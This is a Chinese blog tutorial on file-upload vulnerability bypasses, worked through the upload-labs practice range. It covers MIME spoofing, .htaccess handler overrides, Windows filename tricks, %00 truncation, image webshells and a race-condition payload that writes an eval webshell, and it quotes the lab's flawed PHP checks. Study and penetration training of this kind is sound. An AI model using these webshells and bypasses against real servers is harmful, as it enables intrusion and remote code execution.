文件上传漏洞---Pyload

已于 2024-07-20 17:00:42 修改
阅读量437 收藏 2
点赞数 6
分类专栏: 网络安全攻击 文章标签: 安全 web安全
于 2024-06-25 17:38:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhoutong2323/article/details/139962787
版权

文章目录

目录

文章目录

前言

一.MIME绕过

二.文件后缀绕过

Apache 文件解析漏洞

 Apache 配置文件漏洞

  Windows系统解析漏洞 

PHP 文件截断漏洞

 图片文件漏洞

 竞争条件漏洞

三.phpcms文件上传漏洞

未完待续....

前言

本文重点从靶场案例分析文件上传漏洞常见的Pylod,本文演示靶场upload-labs

文件在服务器的上传路径可以使用浏览器检查功能,查看上传文件所属标签的src属性值

一.MIME绕过

不同的文件对应不同的MIME类型,后端代码通过限制特定的MIME类型防止文件上传漏洞被利用,简单来说防止利用文件上传漏洞上传webshell,后端会禁止.php后缀的文件所代表的MIME类型,从而限制.php文件的上传,下面是一些常见文件的MIME类型:

.txt - text/plain
.html - text/html
.php - application/octet-stream
.css - text/css
.js - application/javascript 或 text/javascript
.png - image/png
.jpg 或 .jpeg - image/jpeg
.gif - image/gif
.pdf - application/pdf
.doc 或 .docx - application/vnd.openxmlformats-officedocument.wordprocessingml.document 或 
.zip - application/zip
.mp3 - audio/mpeg
.mp4 - video/mp4

演示案例:

前置代码须知:

$_FILES 是 PHP 中一个超全局数组,它在处理文件上传时起着至关重要的作用。当表单中的 <input type="file"> 字段被提交时,PHP 会自动填充这个数组,其中包含有关上传文件的信息。这使得开发者能够在服务器端访问和处理这些文件。

$_FILES 数组的结构通常如下所示(以单文件上传为例):

Array  
(  
    [upload_file] =>                         #表单中name属性的值
        (  
            [name] => uploadedfile.jpg       #上传文件的名字
            [type] => image/jpeg             #上传文件的MIME类型
            [tmp_name] => /tmp/php/php6hstj3 #上传文件的临时目录
            [error] => 0   
            [size] => 9812                   #上传文件大小
        )  
)

过滤代码分析: 

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        #检查文件类型代码
        if (($_FILES['upload_file']['type'] == 'image/jpeg') 
            || ($_FILES['upload_file']['type'] == 'image/png') 
            || ($_FILES['upload_file']['type'] == 'image/gif'))
        } 
}

上述代码采用白名单模式,仅支持文件类型为image/jpeg+image/png+image/gif 的文件上传,因此可以通过BurpSuite更改请求包中webshell文件的MIME类型为image/jpeg就可以绕过服务端检测 。

二.文件后缀绕过

Apache 文件解析漏洞

文件后缀绕过的攻击原理:虽然有些服务器端限制了某些后缀的文件上传,但是有些版本的Apache是允许解析其它文件后缀的,例如在http.conf中,如果配置了如下代码就能够告诉浏览器将哪些后缀的文件解析为php文件

AddType application/x-httpd-php .php .php3 .phtml

通过禁止特定后缀的文件防止webshell上传

 防御代码:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR. '/' . $_FILES['upload_file']['name'])) {
                 $img_path = $UPLOAD_ADDR .'/'. $_FILES['upload_file']['name'];
                 $is_upload = true;
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

绕过攻击1:

将Webshell文件后缀改为.php3/phtml等

绕过攻击2:

Apache是从右向左解析文件的后缀。如果最右侧的扩展名不可识别,就继续往左解析,直到遇到可以解析的文件后缀为止。因此,如果上传的文件名类似1.php.xxxx,由于不可以解析xxxx,所以继续向左解析后缀php.

 Apache 配置文件漏洞

 上述提示中几乎禁止l所有可以利用的php文件后缀,此时需要使用.htaccess的文件进行绕过

.htaccess文件作用

.htaccess文件是Apache服务器的配置文件,当Apache服务器运行时,会读取并解释.htaccess文件中的内容用于在特定的目录中配置和控制网站的行为。它可以用来实现各种功能,例如:

重定向:可以将请求重定向到其他网页或目录。
URL重写:可以修改URL的结构,使其更友好或更容易被搜索引擎索引。
认证和授权:可以设置访问密码或限制特定用户访问。
缓存控制:可以设置缓存规则,以提高网站的加载速度。
防止目录列表:可以禁止Apache服务器显示目录的内容列表。
安全性设置:可以限制或阻止特定类型的文件的访问。
MIME类型设置:可以设置文件的MIME类型,以确保它们以正确的方式在网页上显示。

 上述提示未限制.htaccess文件上传,那么可以利用这一点上传一个自定义的.htaccess文件,当Apache服务器运行时,会执行.htaccess文件中自定义动作,来帮助pyload能够成功绕过防护。

演示案例:

通常情况下,将webshell的文件类型从.php更改为其他类型虽然能够绕过防御,同样的webshell也无法被执行和利用,因此上传一个自定义的配置文件.htaccess使得靶机的Apache服务器将目录中的所有文件类型映射为.php类型,从而使得webshell的文件类型不是.php,服务器也会将webshell当作.php文件执行。

#使用php5-script处理器来解析所匹配到的文件
AddHandler php5-script .jpg  

#将特定扩展名文件映射为php文件类型
AddType application/x-httpd-php .jpg

#将该目录及子目录的所有文件均映射为php文件类型
Sethandler application/x-httpd-php

 首先自定义一个.htaccess文件并上传,内容如下:

Sethandler application/x-httpd-php

 .htaccess文件上传后可以使得含有.htaccess文件的目录以及子目录的所有文件被映射为.php文件

然后将.php文件类型的webshell更改为其他类型(如.jpg)并上传,.php文件如下,

<?php phpinfo(); ?>

  Windows系统解析漏洞 

点号绕过:

点号绕过其实就是利用Windows对文件和文件名的限制,Windows系统检测到文件后缀名后有点号,会自动触发命名规范将点号去除

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".phtml"
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

 利用BurpSuit将Webshell的文件后缀更改为 ".php." ,如下图所示:

Windows后台文件展示如下,可以发现点号被系统去除了。

 

 空格绕过

空格绕过的原理一致,都是利用windows系统会自动将文件末尾的点号去除。

windows 文件覆盖漏洞

原理:

Linux中中“ * ” 号的作用是匹配所有字符,windows将小于号"<”解析为星号" * "拥有相同作用,在windows中符号“<”代表匹配任意字符,文件fie.<则代表匹配名为file任意后缀的文件,通俗的说,windows既可以把file.<当作file.php,也可以当作file.jpg,因为<代表匹配任意字符

平时大家都会碰见下面的场景:某个目录下存在fie.php文件,再次上传一个fle.php文件时,系统会提示是否替换

若靶机是windows,因为<<<符号默认匹配所有后缀,那么上传“file.<<<”文件会覆盖名字为fie的文件,不会关心文件后缀是什么。

演示:

文件上传目录upload中存在ant1.php文件

利用BurpSuit将ant1.php改为nt1.<<并上传,看看结果

 

 原先upload目录中ant1.php文件被ant.<<文件覆盖

:正常网页中目录下不会存在PHP文件,可以使用文件截断漏洞上传。

PHP 文件截断漏洞

该漏洞只在PHP版本<5.3.4存在,该漏洞利用PHP底层是C语言,且URL中%00表示ASCII中的0,而ascii中的0字符串结束,所以会把%00后面的所有字符删除,当发现PHP版本<5.3.4时,可以利用该漏洞绕过一些防御过滤。

Get 型截断  

防御代码:

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    获取上传文件的后缀
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    判断上传文件后缀是否和白名单中的后缀匹配
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
        将临时文件内容复制到指定路径的文件中
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';

注释: substr():从指定字符串中的指定位置开始截取 substr(字符串,开始位置)
      strrpos():在指定字符串中查找指定符号最后一次出现的位置,案例中指定符号是“ . ” 号
      指定字符串:($_FILES['upload_file']['name']==>获取文件名
      指定位置:strrpos($_FILES['upload_file']['name'],".")+1==>从.号之后第一个字符开始
      临时文件:此处指上传的文件

代码分析:

 防御代码定义了一个后缀白名单集合 $ext_arr,而$file_ext用来存储上传文件的后缀,接着判断$file_ext的值和$ext_arr的值是否匹配,如果匹配就会将上传文件的内容复制到路径$img_path下的文件中,其中$img_path的目录由接收get参数传递的变量,这就意味这目录可控。

 %00 截断演示

 Get 型 文件截断绕过防御分析:

利用BurpSuit 将webshell文件由php改为png与防御白名单匹配;防御代码在生成$img_path时,由于php版本问题,服务器会将%00看作截断符,会把%00后面的文件名(/随机数+当前日期.上传文件后缀)全部截断,文件复制的路径变为upload/2.php,因此2.png文件中的webshell代码被复制upload/2.php中,最后复制图片链接,删除红框部分就是我们需要的URL地址,使用蚁剑进行连接,进行提权。

为什么不直接将文件名改为2.php%00?

在PHP中,由于$_FILES['upload_file']['name']得到文件名时,%00之后的内容已经被截断,所以$_FILES['upload_file']['name']得到的后缀是php,而不是php%00,此时无法匹配白名单

POST 型截断

与Get 型截断区别:%00是URL编码,post传参并非通过UR,所以无法解析%00,而需要使用16进制添加00

 图片文件漏洞

        当你用记事本打开图片文件时,会看见图片文件的二进制数据在文本编辑器中的表现形式。由于文本编辑器没有渲染这些二进制数据为图像的能力,因此只能以原始的字节形式显示出来。

        黑客往往会把二进制数据中藏有webshell代码的图片上传,再配合文件包含漏洞或PHP文件截断漏洞等使服务器能够执行图片中的webshell代码。

图片码桡过

不同格式文件的图片码开头两个字节不同,JPG--> FF D8(255216)   PNG-->13780  GIF-->7173

通过检查图片码前两个字节可以防止黑客直接将PHP文件(.php)改为(.jpg).,PHP文件标准开头字节已经固定,不会因为后缀名的更改发生改变,防御代码仍然会认为是PHP文件。

防御代码:

function getReailFileType($filename){
    $file = fopen($filename, "rb");  # 以二进制读取模式("rb")打开指定的文件
    $bin = fread($file, 2); //读取文件的头两个字节
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);    
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    
    $fileType = '';    
    switch($typeCode){      
        case 255216:            
            $fileType = 'jpg';
            break;
        case 13780:            
            $fileType = 'png';
            break;        
        case 7173:            
            $fileType = 'gif';
            break;
        default:            
            $fileType = 'unknown';
        }    
        return $fileType;
}

stp 1:将webshell插入图片二进制数据中

copy hua.jpg /b + 2.php /a 123.jpg

这里的/b选项表示以二进制模式进行复制,加号+用于指示copy命令将多个文件合并成一个文件。在这个例子中,hua.jpg2.php的内容会被合并到123.jpg文件中

在浏览器中尝试利用文件包含漏洞验证上传的图片能否被当作PHP文件执行

文件包含漏洞源码:

<?php
/*
本页面存在文件包含漏洞,用于测试图片马是否能正常运行!
*/
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
    include $file;
}else{
    show_source(__file__);
}
?>
http://127.0.0.1/upload-labs/include.php?file=
C:\securty_software\phpStudy_64\phpstudy_pro\WWW\upload-labs/upload/123.jpg

 成功连接

图片二次渲染绕过

防御代码若将上传的图片打乱后生成一个新文件,可能会导致上传的webshell代码部分被破坏,

绕过此种防御需要将webshell插入图片不会被打乱的部分(即新图片和旧图片相同部分)。

 // 获得上传文件的扩展名
    $fileext= substr(strrchr($filename,"."),1);
    //判断文件后缀与类型,合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromjpeg($target_path);
            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".jpg";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = true;
            }

 同样方法上传图片马比对一下新旧差别,可以看见原本红框部分的webshell被打乱了

 因此我们需要找到新旧图片图片码相同部分插入webshell

蓝色部分代表相同:

插入webshell 

 竞争条件漏洞

        一些网站上传文件的逻辑是允许上传任意文件,然后检查上传的文件是否包含webshell脚本,如果包含,则删除该文件。这里存在的问题是,文件上传成功和删除文件这连个操作之间存在一个时间差(因为要执行检查文件和删除文件的操作),攻击者可以利用这个时间差在删除文件前就访问该webshell,就会创建一个新的webshell,从而完成竞争条件的上传漏洞攻击。由于服务器检查和删除文件的耗时极端,所以需要和服务器竞争在极端时间内完成对webshell的访问。

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;
    
    #将临时文件移入指定路径
    if(move_uploaded_file($temp_file, $upload_file)){
        #检查文件是否匹配白名单
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }

        攻击者先上传一个webshell脚本4.php,其内容是生成一个新的webshell脚本shell.php。4.php代码如下:

<?php fputs(fopen('../shell.php','w'),'<?php eval($_POST[a])>'); ?>

注释:
fopen('../shell.php','w'):以写入模式('w')打开(如果不存在则创建)
                            位于当前文件目录的上一 级目录中的shell.php文件
fputs():                   用于指向的文件(shell.php)写入一段PHP代码<?php eval($_POST[a])>;

4.php 上传成功后,客户端立即访问4.php,会在服务端上层目录下自动生成shell.php,这时攻击者就利用时间差完成了webshell的上传。

此处可以使用BurpSuit暴力破解模块,上传4.php文件一个进程,访问4.php文件一个进程

三.phpcms文件上传漏洞

phpcms头像上传漏洞引发的故事

未完待续....

总结

北 染 星 辰
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
pyLoad远程代码执行漏洞复现(CVE-2023-0297)
0xSec
01-30 2787
pyLoad是一个用 Python 编写的免费和开源下载管理器,可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python 编程语言的设备。pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用 js2py 功能执行任意 Python 代码。
Apache文件解析漏洞-01
09-15
Apache文件解析漏洞的利用场景非常广泛,例如在Web程序中存在文件上传功能,但是有黑名单验证时,攻击者可以通过构造特殊的文件名来欺骗Apache服务器,上传恶意文件到目标服务器。例如,攻击者可以上传一个名为"1....
weblogic漏洞复现】CVE-2017-10271+CVE-2020-14882远程命令执行漏洞+CVE-2018-2894任意文件上传漏洞+CVE-2018-2628反序列化远程代码执行漏洞
serendipity1130的博客
09-01 3469
1.CVE-2017-10271 漏洞成因: 由WebLogicServerWLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞 触发漏洞url如下: http://192.168.225.139:7001/wls-wsat/CoordinatorPortType post数据包,通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。 1.扫描到端口号为:7001,进行访问。 nmap192.168.225.138-sV-sC-P
XXE-XML实体注入漏洞
2301_80661529的博客
03-07 1264
DTD(document type definition)文档类型定义用于定义XML文档的结构,它作为xml文件的 一部分位于XML声明和文档元素之间,比如下面DTD它就定义了 XML 的根元素必须是message,根元素下面有一些子元素,所以 XML必须像下 面这么写:其中,DTD需要在!DOCTYPE注释中定义根元素,而后在中括号的[]内使用!ELEMENT注 释定义各元素特征。
文件上传漏洞总结
weixin_46739058的博客
03-18 9872
目录 1、文件上传漏洞原理 2、常见的文件上传类型 3、文件上传注入点 4、web中常见的上传验证 黑名单常见自定义过滤规则 白名单常见的过滤规则 5、逻辑数组绕过 5.1、图片一句话木马的制作与利用 5.2、文件头检查 5.3、getimagesize()图像信息判断 5.4、竞争条件攻击 5.5、突破exif_imagetype() 5.6、脚本解析漏洞 6、WAF绕过 1、文件上传漏洞原理 网站Web应用都有一些文件上传功能,比如文档、图片、头像、视频上传,当上
ImageMagick任意文件读取漏洞(CVE-2022-44268)
god_Zeo的安全博客
02-12 3710
爆出一个 ImageMagick 漏洞 CVE-2022-44268 ,在ImageMagick 7.1.0-51版本及以前 ,可以造成一个任意文件读取的危害比较可观,最近有时间来复现学习一下
web安全原理-文件包含漏洞
笑花大王
01-20 353
前言 起来吃完早饭就开始刷攻防世界的题,一个简单的文件包含题我竟然都做不出来我服了 拿出买的书开始从头学习总结文件包含漏洞! 一、文件包含漏洞 文件包含漏洞 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。 文件包含漏洞肯能会造成服务器网页被篡改、网站被挂马、服...
用友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
02-24 455
用友协同云是新一代的企业社交化协同办公平台,不仅为企业提供协同办公服务,更作为企业数字化工作入口,服务企业内部员工、连接企业外部伙伴及上下游产业链。通过移动端、Web 端、PC桌面端等多端联动,为企业提供统一服务入口、沟通协作、办公协同、企业文化激活、业务协同等全方位的数智化工作平台。用友U8-OA 协同工作系统遵循 J2EE 架构,以 JSP 和 JAVA BEAN 技术作为主要的系统实现手段,开发出了工作流、文档、消息提醒和插件接口。
[web安全-文件包含漏洞解析] 第一次有人把文件包含漏洞讲的通俗易懂及DVWA文件上传靶场的解题过程
m0_73033023的博客
04-21 713
了解文件包含是什么 文件包含漏洞(File Inclusion)是一种最常见的依赖于脚本运行而影响 Web 应用程序的漏洞。当应用程序使用攻击者控制的变量建立一个可执行代码的路径,允许攻击者控制在运行时执行哪个文件时,就会导致文件包含漏洞。 程序开发人员通常会把可重复使用的函数写入单个文件中,在使用这些函数时,程序开发人员直接调用此文件,而无需再次编写函数,这种调用文件的过程一般被称为文件包含。此外,程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用。但正是由于这种灵活性,
文件上传漏洞payload
gaoyifeixy的博客
03-26 518
需要注意的是,这些Payload可能会因为目标应用程序的不同而不起作用。
web网站文件上传漏洞和攻击-运维安全详细笔记
06-30
Web 网站文件上传漏洞和攻击 - 运维安全详细笔记 文件上传漏洞Web 应用程序中的一种常见漏洞,攻击者可以通过上传恶意文件来获取服务器的控制权。本文将详细介绍文件上传漏洞的原理、实验步骤和防御方法。 一、...
Web安全渗透学习-文件上传漏洞-附件资源
03-02
Web安全渗透学习-文件上传漏洞-附件资源
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
01-08
在今天的信息安全时代,文件上传漏洞是一种常见的 web 漏洞,攻击者可以通过上传恶意文件来获取服务器的控制权。因此,学习和掌握文件上传漏洞的检测和防御方法是非常重要的。为此,我们需要一个实践的环境来训练和...
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 553
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 585
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
邮件安全篇:邮件端到端加密S/MIME
最新发布
sdexcel的专栏
07-19 806
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 819
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相关风险。
园区道路车辆智能管控视频解决方案,打造安全畅通的园区交通环境
TSINGSEE青犀视频官方技术博客
07-16 836
AI智能分析网关V4消防通道占用算法基于人工智能视觉分析技术,通过摄像头实时监测识别是否有机动车违规停放在消防车通道上,并及时提醒管理人员进行处理。
泛微 e-cology 前台文件上传漏洞
07-28
泛微e-cology前台文件上传漏洞是指在泛微e-cology系统的前台功能中存在漏洞,攻击者可以利用该漏洞上传恶意文件到服务器上。根据引用\[1\]中提到的CNVD-2020-33199漏洞编号,该漏洞可能存在于泛微e-cology9版本的前台文件上传功能中。具体触发点位于文件/global_search.php的第108行,调用了doc2text()函数,并追溯到doc2txt()函数中的$FILE_PATH参数的源代码。该参数连接了附件目录(C:\eoffice9\webroot\ATTACHMENT)的数据表FLE_CONTENT中ATTACHMENT_ID和ATTACHMENT_NAME列的值,以获取完整的文件路径。\[2\] 需要注意的是,根据引用\[3\]中的声明,本文提供的信息仅供网络安全人员参考,未经授权请勿利用文章中的技术资料进行任何入侵操作。同时,禁止将本文提供的工具用于其他目的。 #### 引用[.reference_title] - *1* [泛微e-cology9前台文件上传漏洞复现](https://blog.csdn.net/qq_41490561/article/details/116119845)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [泛微E-Office前台文件上传漏洞](https://blog.csdn.net/u010025272/article/details/131312528)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北 染 星 辰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值